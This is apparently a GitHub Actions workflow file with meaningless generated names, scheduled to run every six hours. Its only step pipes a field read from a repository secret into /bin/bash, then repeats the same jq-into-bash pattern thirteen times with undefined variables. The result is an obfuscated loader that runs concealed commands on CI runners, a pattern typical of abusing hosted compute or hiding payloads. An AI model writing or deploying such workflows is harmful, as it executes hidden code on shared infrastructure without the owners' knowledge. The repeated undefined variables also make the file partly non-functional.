name: ourselvessuffix

on:
  workflow_dispatch:
  schedule:
    - cron: '30 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: ourselvessuffix
        env:
          f4: ${{ secrets.f4 }}
        run: |
          echo $f4 | jq -r .cjlpj0 | /bin/bash
          echo $db48455 | jq -r .dqtj7381 | /bin/bash
          echo $ay4506 | jq -r .okm95815 | /bin/bash
          echo $fkv96 | jq -r .n967 | /bin/bash
          echo $cknn24508 | jq -r .rq3087 | /bin/bash
          echo $km900 | jq -r .x6 | /bin/bash
          echo $hbrj9 | jq -r .u65840 | /bin/bash
          echo $srii156 | jq -r .flr33 | /bin/bash
          echo $fi7 | jq -r .oxow1578 | /bin/bash
          echo $tp9131 | jq -r .z48 | /bin/bash
          echo $m86 | jq -r .qs88575 | /bin/bash
          echo $nojbx66 | jq -r .z28 | /bin/bash
          echo $ujnte94 | jq -r .i3954 | /bin/bash
          echo $yay6248 | jq -r .tkx6190 | /bin/bash

